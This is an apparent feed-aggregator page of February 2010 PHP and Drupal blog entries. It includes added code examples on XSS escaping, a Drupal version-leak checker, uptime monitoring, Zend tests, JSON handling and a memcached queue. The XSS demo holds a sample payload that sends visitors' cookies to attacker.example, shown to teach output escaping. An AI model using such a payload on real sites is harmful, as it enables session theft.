News aggregator

Appnovation Technologies: 4 Drupal Security Issues

Drupal Planet - Mon, 2010-02-08 23:59
Mon, Feb 8, 2010 by Arnold

While Drupal is a secure system, there are 4 configuration issues that are often overlooked when developing a Drupal site. By following a few easy steps, we can make a Drupal site much less vulnerable.

1) Leaving Drupal Version Information Text Files on Server
Many developers forget to delete CHANGELOG.txt and the other text files (INSTALL.txt, UPGRADE.txt, MAINTAINERS.txt and so on) that ship in the Drupal package. Drupal's own .htaccess does not block requests for .txt files, so if they are left in the document root anyone can read them and learn the exact Drupal version you are running. Knowing the version lets an attacker go straight to the published advisories and exploits for that release. Delete the files after installation, or deny them in the web server configuration. Note that this removes only one fingerprint (the version can also be inferred from other shipped files), so it is no substitute for keeping up with security updates.

2) Cross-Site Scripting
Cross-site scripting happens when visitor-supplied text containing HTML or JavaScript is placed into a page unfiltered: whatever a visitor typed into a form box ends up running in every other visitor's browser. Two controls apply. First, keep the input formats tight: only trusted roles should have the Full HTML format, and everyone else should be limited to Filtered HTML, which passes posted text through filter_xss() with a short tag whitelist. Second, in your own module and theme code, escape untrusted values at the point they are output, not at the point they are received: check_plain() for values rendered as plain text, and check_markup() or filter_xss() for values that are allowed to contain markup. Escaping on input is the wrong place, because the same value is reused in contexts (attributes, JavaScript, e-mail) that each need different treatment.
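The following is an added example, not code from the Appnovation post or from Drupal itself. It shows the difference between dropping user text straight into markup and escaping it on output the way check_plain() does. In Drupal 6 check_plain() is essentially htmlspecialchars($text, ENT_QUOTES, 'UTF-8') behind a UTF-8 validity check; the stand-alone copy below mirrors that so the script runs without a Drupal bootstrap. The attacker input is constructed for the demonstration.

```php
<?php
// Added example (not from the Appnovation post): output escaping for
// user-supplied text in the style of Drupal's check_plain(). This
// stand-alone version mirrors what check_plain() does so the script runs
// without a Drupal bootstrap.

function check_plain_standalone($text) {
    // Reject invalid UTF-8 first: some browsers treat malformed byte
    // sequences leniently, which can reopen an escaping bypass.
    if (!preg_match('//u', $text)) {
        return '';
    }
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

// Vulnerable: user text concatenated straight into markup.
function render_comment_unsafe($author, $body) {
    return '<div class="comment"><b>' . $author . '</b>: ' . $body . '</div>';
}

// Hardened: every untrusted value is escaped at the point it enters HTML.
// This covers element content; values placed into attributes or inline
// JavaScript need escaping for that context as well.
function render_comment_safe($author, $body) {
    return '<div class="comment"><b>' . check_plain_standalone($author)
         . '</b>: ' . check_plain_standalone($body) . '</div>';
}

// Constructed attacker input for the demonstration.
$author = 'mallory" onmouseover="alert(1)';
$body   = 'Nice post <script>document.location="http://attacker.example/?c="+document.cookie</script>';

$unsafe = render_comment_unsafe($author, $body);
$safe   = render_comment_safe($author, $body);

// The unsafe rendering still contains a live <script> tag; the safe one
// contains only the escaped text &lt;script&gt;.
var_dump(strpos($unsafe, '<script>') !== false);
var_dump(strpos($safe, '<script>') === false);

echo $safe, PHP_EOL;
```

The same rule applies to output produced by drupal_set_message(), t() placeholders (use @ or % placeholders for untrusted text, never !) and theme functions: escape where the value meets HTML, once, in the context it is going into.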

3) Exposing Apache/Server Tokens
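The following is an added check, not code from the Appnovation post, covering items 1 and 3 together: it requests the shipped text files from a site, extracts the Drupal version from CHANGELOG.txt if it is readable, and reports a verbose Server header. For Apache the fix for item 3 is ServerTokens Prod together with ServerSignature Off. The URL is a command-line argument; the parsing functions are also exercised on constructed sample data so the script can be run with no network access. Run it only against sites you are responsible for.

```php
<?php
// Added example (not from the Appnovation post): a pre-launch check for the
// two fingerprinting leaks, readable version text files and a verbose
// Server header. Usage: php drupal_leak_check.php http://www.example.com

// CHANGELOG.txt in a Drupal release has lines like "Drupal 6.15, 2009-12-16".
// Return the first version mentioned, or null.
function drupal_version_from_changelog($body) {
    if (preg_match('/^Drupal (\d+\.\d+(?:-[\w.]+)?),/m', $body, $m)) {
        return $m[1];
    }
    return null;
}

// Return the value of the Server header from a raw header array, or null.
function server_header($headers) {
    foreach ($headers as $line) {
        if (stripos($line, 'Server:') === 0) {
            return trim(substr($line, strlen('Server:')));
        }
    }
    return null;
}

// "Apache" alone is what Apache sends with "ServerTokens Prod"; anything
// longer (version, OS, loaded modules) is a leak worth removing.
function server_header_is_verbose($value) {
    return $value !== null && !preg_match('/^[A-Za-z-]+$/', $value);
}

// Files shipped in the Drupal tarball that should not be reachable over HTTP.
$text_files = array('CHANGELOG.txt', 'INSTALL.txt', 'UPGRADE.txt',
                    'MAINTAINERS.txt', 'LICENSE.txt', 'INSTALL.mysql.txt');

if ($argc > 1) {
    $base = rtrim($argv[1], '/');
    // ignore_errors: return the body on 4xx/5xx too, so we can read the status line.
    $ctx  = stream_context_create(array('http' => array('timeout' => 10, 'ignore_errors' => true)));
    foreach ($text_files as $f) {
        $http_response_header = array();
        $body = @file_get_contents("$base/$f", false, $ctx);
        // $http_response_header is filled in by PHP's HTTP stream wrapper.
        if ($body !== false && isset($http_response_header[0])
            && strpos($http_response_header[0], ' 200') !== false) {
            $ver = drupal_version_from_changelog($body);
            echo "LEAK: $f is readable" . ($ver ? " (Drupal $ver)" : '') . PHP_EOL;
        }
    }
    $http_response_header = array();
    @file_get_contents($base . '/', false, $ctx);
    $srv = server_header($http_response_header);
    if (server_header_is_verbose($srv)) {
        echo "LEAK: Server header is '$srv'; set 'ServerTokens Prod' and 'ServerSignature Off'" . PHP_EOL;
    }
    exit;
}

// Offline demonstration on constructed data.
$sample_changelog = "Drupal 6.15, 2009-12-16\n------------------------\n- Fixed security issues.\n\nDrupal 6.14, 2009-09-16\n";
var_dump(drupal_version_from_changelog($sample_changelog));
$sample_headers = array('HTTP/1.1 200 OK', 'Server: Apache/2.2.14 (Ubuntu) PHP/5.2.10', 'Content-Type: text/html');
var_dump(server_header_is_verbose(server_header($sample_headers)));
var_dump(server_header_is_verbose('Apache'));
```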

Categories: Drupal Planet, Php

Benjamin Eberlei's Blog: Resources for a PHP and Hudson CI Integration

PHPDeveloper.org - Mon, 2010-02-08 20:13

Benjamin Eberlei has a new post to his blog today pointing you to some PHP & Hudson CI integration resources that can help you get this powerful combination up and running for your deployment process.

Although phpUnderControl is the most widespread solution, from what I heard it is complex to set up/maintain and supposedly a hack, and Arbit is just in an early alpha, so I decided to give Hudson a shot. Another reason for this decision: I heard it has a simple plugin architecture and is easy to install and use.

He moved away from his own bash script-based CI setup towards something a bit more technical, something that would give him a bit more control over running unit tests, creating code coverage reports, etc. He lists three sites that helped him get his Hudson install up and running, and another is mentioned in the comments.

Categories: Php, PHPDeveloper.org

CatsWhoCode.com: How to easily monitor your web server using PHP

PHPDeveloper.org - Mon, 2010-02-08 19:48

In a new post to the CatsWhoCode.com blog Jean-Baptiste Jung walks you through the creation of a simple monitoring script, written in plain PHP, that can tell you whether your web site is up and responsive.

In order to make sure that your website is always available to the public, you have to monitor it. In this tutorial, I'll show you how you can easily create a monitoring script that will check your website's availability and send an email or SMS alert to you if it isn't available.

They have a snippet of code (about 15 lines long) with a function you can call to open a connection to a remote host and check the returned data for a certain string. This ensures not only that your site is responsive but also that it is not responding incorrectly. You could even point it at a dedicated monitoring page on your site to check for specific things (like database connection problems).
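The following is an added example in the same spirit, not the CatsWhoCode script. It opens a TCP connection with a timeout, issues a plain HTTP GET, bounds the read so a half-open server cannot stall the monitor, and treats the site as healthy only if the response has a 200 status and contains an expected marker string. The host, path, marker and alert address are placeholders.

```php
<?php
// Added example (not the CatsWhoCode script): a bounded availability check
// that requires both a 200 status and a known marker in the body.

function check_site($host, $path, $expected, $port = 80, $timeout = 5) {
    $errno = 0;
    $errstr = '';
    $fp = @fsockopen($host, $port, $errno, $errstr, $timeout);
    if (!$fp) {
        return array('ok' => false, 'reason' => "connect failed: $errstr ($errno)");
    }
    // Bound the read as well as the connect; a server that accepts the
    // connection and then hangs would otherwise block the monitor forever.
    stream_set_timeout($fp, $timeout);
    fwrite($fp, "GET $path HTTP/1.0\r\nHost: $host\r\nUser-Agent: uptime-check\r\nConnection: close\r\n\r\n");

    $response = '';
    while (!feof($fp)) {
        $chunk = fread($fp, 8192);
        if ($chunk === false) {
            break;
        }
        $response .= $chunk;
        $info = stream_get_meta_data($fp);
        if ($info['timed_out']) {
            fclose($fp);
            return array('ok' => false, 'reason' => 'read timed out');
        }
    }
    fclose($fp);

    if (!preg_match('#^HTTP/1\.[01] (\d{3})#', $response, $m)) {
        return array('ok' => false, 'reason' => 'malformed response');
    }
    if ($m[1] !== '200') {
        return array('ok' => false, 'reason' => "HTTP status {$m[1]}");
    }
    // A broken site can still answer 200 with an error page, so also
    // demand a string that only the healthy page contains.
    if (strpos($response, $expected) === false) {
        return array('ok' => false, 'reason' => 'marker string missing');
    }
    return array('ok' => true, 'reason' => 'up');
}

// Placeholders: point these at a page whose content is stable.
$result = check_site('www.example.com', '/', '<title>');
if (!$result['ok']) {
    // mail() is what the original tutorial uses for alerts; most SMS
    // gateways accept an e-mail address as well.
    mail('ops@example.com', 'Site check failed', $result['reason']);
}
echo $result['reason'], PHP_EOL;
```

If you point the check at a monitoring page that exercises the database, restrict that page by source address and keep its output generic: a page that prints connection errors or query timings is both an information leak and a cheap way for someone else to load your database.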

Categories: Php, PHPDeveloper.org

Xebee Blog: Test Driven Development with Zend Framework and PHPUnit

PHPDeveloper.org - Mon, 2010-02-08 18:05

On the Xebee blog there's a recent post looking at test-driven development with the Zend Framework and PHPUnit. They show how the two work well together and make it simpler to use TDD to create and test your applications.

Over the past few days I was going through the Zend Framework reference docs and I found myself pleasantly surprised with all that the latest version of this web application framework provides. [...] Out of the many new features, what stood out for me was the ease with which Zend Framework and PHPUnit complement and work with each other.

He talks about some of the features of PHPUnit (including test dependencies and testing for exceptions and errors) and how it fits into a good deployment strategy. He shows how you can use the Zend_Test component of the framework, along with its Zend_Test_PHPUnit classes, to write a sample test case. There's also an example of using the Zend_Test_PHPUnit_Db component to test your backend data stores by comparing their contents to a flat XML data set.
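The following is an added example of a Zend_Test_PHPUnit controller test, not code from the Xebee post or from Zend Framework; it uses the test case to pin down two access-control rules so they fail loudly in CI if someone later breaks them. The APPLICATION_PATH constant, the /admin and /auth/login routes, the ACL plugin and the login form markup are assumptions about a hypothetical Zend Framework 1.10 application.

```php
<?php
// Added example (not from the Xebee post): a Zend_Test_PHPUnit controller
// test that asserts access-control behaviour of a hypothetical application.
require_once 'Zend/Application.php';
require_once 'Zend/Test/PHPUnit/ControllerTestCase.php';

class AdminAccessTest extends Zend_Test_PHPUnit_ControllerTestCase
{
    public function setUp()
    {
        // Zend_Test bootstraps the real application, so routes, front
        // controller plugins and the ACL behave as they do in production.
        // APPLICATION_PATH is assumed to be defined by the PHPUnit bootstrap.
        $this->bootstrap = new Zend_Application(
            'testing',
            APPLICATION_PATH . '/configs/application.ini'
        );
        parent::setUp();
    }

    public function testAnonymousUserIsRedirectedFromAdmin()
    {
        $this->dispatch('/admin');
        // If the ACL plugin is removed or the route mis-registered, the
        // request would reach the admin controller and this test fails.
        $this->assertRedirectTo('/auth/login');
        $this->assertNotController('admin');
    }

    public function testLoginFormRejectsMissingCsrfToken()
    {
        $this->request->setMethod('POST')
             ->setPost(array('username' => 'alice', 'password' => 'secret'));
        $this->dispatch('/auth/login');
        // Without the Zend_Form_Element_Hash value the form must not
        // validate: the controller re-renders the form instead of logging in.
        $this->assertNotRedirect();
        $this->assertResponseCode(200);
        $this->assertQuery('form#login .errors');
    }
}
```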

Categories: Php, PHPDeveloper.org

Blue Parabola Blog: Lies, Damn Lies, and Statistics - Zend's Drupal Benchmarks

PHPDeveloper.org - Mon, 2010-02-08 17:49

New on the Blue Parabola blog today, there's an article from Keith Casey trying to set the record straight on some recent benchmarks put together by Zend and Acquia showing the performance of Drupal.

While I have not attempted to duplicate or validate any of their individual numbers or conclusion as a whole, I have been a Drupal user for well over five years and have launched 30+ sites on it.

With this experience to back him up, he points out a few things about the report that either needed work or were misleading in their results. This includes a limitation on the web server configurations they covered, the statistics on Windows performance (might turn people off to using it on this platform) and the emphasis being put in some of the wrong places - optimizing PHP versus Drupal.

He recommends that, as with all such studies and whitepapers, you take the results only as guidelines and examples, not as absolute facts. There are always going to be differences in hardware, software and configuration, so what gave the big numbers and results for them might not work for you.

Categories: Php, PHPDeveloper.org

David Stuart: Drupalcon SF 2010 session submission - How to build a Jobs Aggregation Search Engine with Nutch, Apache Solr and Views 3 in abou

Drupal Planet - Mon, 2010-02-08 17:26

Yeah, I just submitted my Drupalcon San Francisco 2010 session; now I have to wait to see if it's worthy of a talk. Fingers crossed!

Here are the details and the Drupal Con session submission link, just in case you were wanting to vote for it on Feb 16th, 2010:

Categories: Drupal Planet, Php

Internet.com: Passing Data Between PHP and JavaScript Using JSON (Video)

PHPDeveloper.org - Mon, 2010-02-08 16:51

As Developer.com mentions in a new article, there's a new video tutorial posted over on Internet.com about using PHP and JSON to pass around data in your applications.

Got seven minutes to learn how you can harness the power of PHP, JavaScript and JSON in a powerful AJAX-driven web application? This Internet.com Video tutorial shows you all you need to know to pass data between the client and server using JSON data format.

The video explains a bit about JSON+PHP and shows you how to send a simple message (book-related data) to the server and how to handle the response with a little help from jQuery's Ajax functions.
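The following is an added example of the server half of that exchange, not code from the Internet.com video. The request shape ({"isbn": ...}), the in-memory catalogue and the response fields are assumptions. The handler is a plain function so it can be exercised from the command line; under a web server it reads the POST body that a jQuery $.ajax call with contentType 'application/json' sends.

```php
<?php
// Added example (not from the Internet.com video): a JSON endpoint that
// validates the decoded request before acting on it and sends the reply
// with a correct Content-Type.

function handle_book_request($raw_json) {
    $data = json_decode($raw_json, true);
    // json_decode() returns null both for invalid JSON and for the literal
    // "null"; treat anything that is not an object as a bad request.
    if (!is_array($data)) {
        return array('status' => 400, 'body' => array('error' => 'invalid JSON'));
    }
    if (!isset($data['isbn']) || !is_string($data['isbn'])
        || !preg_match('/^\d{13}$/', $data['isbn'])) {
        return array('status' => 400, 'body' => array('error' => 'isbn must be 13 digits'));
    }
    // Constructed catalogue standing in for a database lookup.
    $catalogue = array('9780000000002' => 'Example Book');
    if (!isset($catalogue[$data['isbn']])) {
        return array('status' => 404, 'body' => array('error' => 'not found'));
    }
    return array('status' => 200, 'body' => array(
        'isbn'  => $data['isbn'],
        'title' => $catalogue[$data['isbn']],
    ));
}

function send_json($status, $body) {
    // The JSON Content-Type stops browsers from sniffing the body as HTML;
    // the JSON_HEX_* flags keep "</script>" and quotes inert if the same
    // output is ever inlined into a page.
    header('Content-Type: application/json; charset=utf-8', true, $status);
    echo json_encode($body, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

if (PHP_SAPI === 'cli') {
    // Constructed requests for an offline run: valid, malformed isbn, not JSON.
    foreach (array('{"isbn":"9780000000002"}', '{"isbn":"123"}', 'not json') as $raw) {
        $r = handle_book_request($raw);
        echo $r['status'], ' ', json_encode($r['body']), PHP_EOL;
    }
} else {
    // The jQuery side sends the body with
    // $.ajax({type: 'POST', contentType: 'application/json', data: JSON.stringify(obj)}).
    $r = handle_book_request(file_get_contents('php://input'));
    send_json($r['status'], $r['body']);
}
```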

Categories: Php, PHPDeveloper.org

Palantir: We're not an underground success anymore

Drupal Planet - Mon, 2010-02-08 16:05

Filmmaker John Waters began his career as an "underground success", making films that mainstream wouldn't touch because they were too controversial, raunchy, or just plain weird. After several underground successes, however, he started to get noticed outside of underground and indie circles and move into the mainstream, where he had even more commercial success.

Many of his fans derided him for the move, claiming he was "caving in to the man" or betraying his underground roots by adapting his style for wider audiences. In an interview for his 1998 film Pecker, Waters made the comment (sadly I do not have the direct quote handy) that the problem with being an underground success is that you then, by definition, cannot stay underground. And yes, that means you sometimes have to change things.

Why do I bring this up? Because Drupal has long since ceased being an underground success and is now a major mainstream open source player... and it's time that the community acted like it.

Categories: Drupal Planet, Php

Abhinav Singh's Blog: MEMQ : Fast queue implementation using Memcached and PHP only

PHPDeveloper.org - Mon, 2010-02-08 15:03

Abhinav Singh has a new post to his blog that looks at using a powerful tool, memcached, with PHP to create a simple queue system that could be reused just about anywhere.

Memcached is a scalable caching solution developed by Danga interactive. One can do a lot of cool things using memcached including spam control, online-offline detection of users, building scalable web services. In this post, I will demonstrate and explain how to implement fast scalable queues in PHP.

He starts with an overview of what the queue will let you do: save data into the queue under a unique identifier and pull it back out by the key requested (at which point it is removed from the queue). The code sets up the connection to the memcached server and gives you methods to check whether the queue is empty and to push and pull records in and out. A bit of sample code illustrates how to put it to use.
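The following is an added example of the same idea, not the MEMQ code from the post: a minimal FIFO queue on memcached using the pecl/memcache extension, with the push, pull and isEmpty operations the post describes plus a lookup by id. It assumes a memcached instance on 127.0.0.1:11211 and a single consumer (see the comment on pull()). Two caveats a practitioner should keep in mind: memcached has no authentication, so bind it to a private interface, and it is a cache, so items and even the counters can be evicted under memory pressure; do not queue anything you cannot afford to lose.

```php
<?php
// Added example (not the MEMQ code from the post): a FIFO queue on memcached
// built from two atomic counters and one key per item.

class MemcacheQueue {
    private $mc;
    private $prefix;
    private $head;   // counter key: id of the last item pulled
    private $tail;   // counter key: id of the last item pushed

    public function __construct($name, $host = '127.0.0.1', $port = 11211) {
        $this->mc = new Memcache();
        if (!$this->mc->connect($host, $port)) {
            throw new RuntimeException("cannot reach memcached at $host:$port");
        }
        $this->prefix = "memq:$name:";
        $this->head = $this->prefix . 'head';
        $this->tail = $this->prefix . 'tail';
        // add() does nothing when the key already exists, so restarting a
        // producer does not reset a live queue.
        $this->mc->add($this->head, 0);
        $this->mc->add($this->tail, 0);
    }

    private function itemKey($id) {
        return $this->prefix . 'item:' . $id;
    }

    // increment() is atomic on the server, so several producers can push
    // concurrently and each gets a unique id.
    public function push($data) {
        $id = $this->mc->increment($this->tail);
        if ($id === false) {
            throw new RuntimeException('tail counter missing (evicted or flushed?)');
        }
        // Flag 0 (no compression); the extension serialises arrays itself.
        $this->mc->set($this->itemKey($id), $data, 0, 0);
        return $id;
    }

    public function isEmpty() {
        return (int) $this->mc->get($this->head) >= (int) $this->mc->get($this->tail);
    }

    // Single consumer only: memcached has no transactions, so two consumers
    // racing here could both advance head and one item would be skipped.
    public function pull() {
        if ($this->isEmpty()) {
            return null;
        }
        $id = $this->mc->increment($this->head);
        $key = $this->itemKey($id);
        $data = $this->mc->get($key);
        $this->mc->delete($key);
        return $data;
    }

    // Fetch an item by the id push() returned, without advancing the queue.
    public function peek($id) {
        return $this->mc->get($this->itemKey($id));
    }
}

$q = new MemcacheQueue('mail');
$id = $q->push(array('to' => 'alice@example.com', 'subject' => 'hello'));
var_dump($q->isEmpty());
var_dump($q->peek($id));
var_dump($q->pull());
var_dump($q->isEmpty());
```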

Categories: Php, PHPDeveloper.org

Run Drupal: Better SEO Using The Page Title Module

Drupal Planet - Mon, 2010-02-08 14:53

Anyone who has been doing Search Engine Optimization (SEO) for a very long time knows that what you title your web pages is very important. To get a little technical, since there can be some confusion, when I refer to Page Titles I mean what is between the <title> and </title> tags in the head portion of a web page. This is the title that shows at the top of your web browser when visiting a page.


Categories: Drupal Planet, Php

Richard Thomas' Blog: Solar Framework Shorts - The Road to Solar 1.0

PHPDeveloper.org - Mon, 2010-02-08 14:37

In another of his "Solar Shorts" Richard Thomas talks about the road to Solar 1.0 as broken down into three points that will lead up to the framework's 1.0 release.

If you haven't taken a look at the Solar Framework in the past now is the time to do so as the three biggest complaints about Solar are on the road to be resolved.

Some of the things that might have made you skip over the framework in the past are being worked on right now:

  • Solar has been in perpetual alpha/beta forever.
  • Documentation: all the cool frameworks have cool docs.
  • Examples: sometimes the easiest way to learn is to study a working application.

For more information about the Solar framework, head over to SolarPHP.com and grab the latest copy.

Categories: Php, PHPDeveloper.org

Victor Kane: Aegir 0.4 Alpha 5 installed on my Linode VPS, and now I've got my little ecommerce platform kicked-off!

Drupal Planet - Mon, 2010-02-08 13:54

I read on the Development Seed blog about a new release, Aegir 0.4 Alpha 5, and since aWebFactory finds itself in the midst of retooling (Git! Aegir! ... more soon), I knew this was a great moment for biting the bullet: to stop reading about Aegir and actually install and enjoy all that hard work the devs had been doing.

The post includes a link to mig5's incredible video (see below for References and links), which basically follows the step-by-step instructions found in the officially supported INSTALL.txt; the first part of this article basically consists of the steps I took following along. It took me about two hours to install Aegir and make my first use of it (deploying some new staging sites), as well as to write this post.


Categories: Drupal Planet, Php

Krimson: Towards a perfect Drupal Development Environment.

Drupal Planet - Mon, 2010-02-08 11:30

Below you'll find my slides for the presentation at fosdem 2010

Setting up a new machine to be able to do Drupal development often takes a lot of time, googling and tweaking. To ease that process I've created an automated installation process which gets you up to speed in roughly 20 minutes.
The whole installation process is split up into three different steps.

  • Setup Lamp Server
  • Setup Drush
  • Setup Eclipse

These steps have been automated based on a freshly installed Ubuntu 9.04.
Just run the following code and follow the trivial installation steps.

Categories: Drupal Planet, Php

Gábor Hojtsy: Presentation evolution

Drupal Planet - Mon, 2010-02-08 11:17

I remember how skeptical I was, a decade or so ago, looking at presenters traveling around to multiple conferences with "the same" presentation. Having been a course instructor for years and a presenter for even longer, it looks completely different now. It's not only that the topics you cover under the same-looking umbrella can be quite different; you also find much better ways to express whatever you want to tell your audience as you get feedback.

Of course the best would be to present your story crystal clear from the start, but despite being an enthusiastic follower of Garr Reynolds and Nancy Duarte, you'll undoubtedly need lots of time anyway to take a relaxed look at your story and distill it to the level needed to form a great presentation. I've actually found it quite hard to refine my slides without actually showing/presenting them to an audience. The faces, questions, smiles and sometimes plain staring expressions you get tell you how you did, and you can derive ways to improve.

Two interesting examples are my slides on Drupal 7 and localize.drupal.org.


Categories: Drupal Planet, Php

Magnity Webdesign: D7 Fields in Core

Drupal Planet - Mon, 2010-02-08 10:52

In Drupal 7, one of the major advantages is Fields in Core, the concept that any and every entity can have fields added to it in a standardised manner. All of the CRUD is dealt with by core rather than relying on contributed modules. It is an evolution of the CCK module for Drupal 6 and before.

We have been using Fields in Core in the update of the Storm module to Drupal 7, and it is quite easy to get going with.


Categories: Drupal Planet, Php

Google Airs Super Bowl Ad

Slashdot.org - Mon, 2010-02-08 03:19
theodp writes "CNET's hunch that Google might run a Super Bowl ad entitled 'Parisian Love' proved to be well-founded. The ad just ran (did you know that you can search the Internet using Google?), and Apple certainly doesn't have to worry about losing its claim to having produced the best Super Bowl ad ever. In fact, you might want to check out the spoof 'Parisian Love' apparently inspired — 'Is Tiger Feeling Lucky?' — if you want to see a better pitch for Google."

Categories: Slashdot.org

Chinese Man Gets 30 Months For Fake Cisco Sales

Slashdot.org - Mon, 2010-02-08 01:02
alphadogg writes "A Chinese man was sentenced to two-and-a-half years in a US prison this week for trafficking in counterfeit Cisco Systems gear. Yongcai Li, 33, will also have to pay the networking company nearly $800,000 in restitution after being the conduit for hundreds of thousands of dollars' worth of counterfeit computer hardware, the FBI said Friday. Prosecutors said he procured the fake gear in China and then sent it to co-conspirators in the US. His alleged co-conspirators have not been charged. Li was arrested by FBI agents on Jan. 9, 2009, in Las Vegas — while the annual Consumer Electronics Show was taking place there. Two years ago, the FBI claimed to have seized more than $78 million worth of counterfeit equipment in more than 400 seizures."

Categories: Slashdot.org

Restructured Ruby on Rails 3.0 Hits Beta

Slashdot.org - Sun, 2010-02-07 22:50
Curlsman informs us that the first beta of Ruby on Rails 3.0 has been released (release notes here). Rails founder David Heinemeier Hansson blogged that RoR 3.0 "feels lighter, more agile, and easier to understand." This release is the first the Merb team has participated in. Merb is a model-view-controller framework written in Ruby, and they joined the RoR development effort over a year ago. Reader Curlsman asks, "So, is version 3 of RoR going to be a big deal, more of the same (good or bad), or just churning technology?"

Categories: Slashdot.org

Glenn Burks: Drupal Backup and Migrate 2.2 Module Issue?

Drupal Planet - Sun, 2010-02-07 22:15

Over the past two days I spent quite a few hours trying to figure out why the update for Backup and Migrate 2.2 would not save to the scheduled folder.

Since I had two sites and it was only occurring on one of them, I knew it was not the module itself but more likely a permissions issue. This is where I spent most of my time, verifying the various folders' permissions, ownership, etc.

The Drupal module Backup and Migrate places an htaccess file in each of the folders, manual and scheduled, with:

order deny,allow
deny from all

Categories: Drupal Planet, Php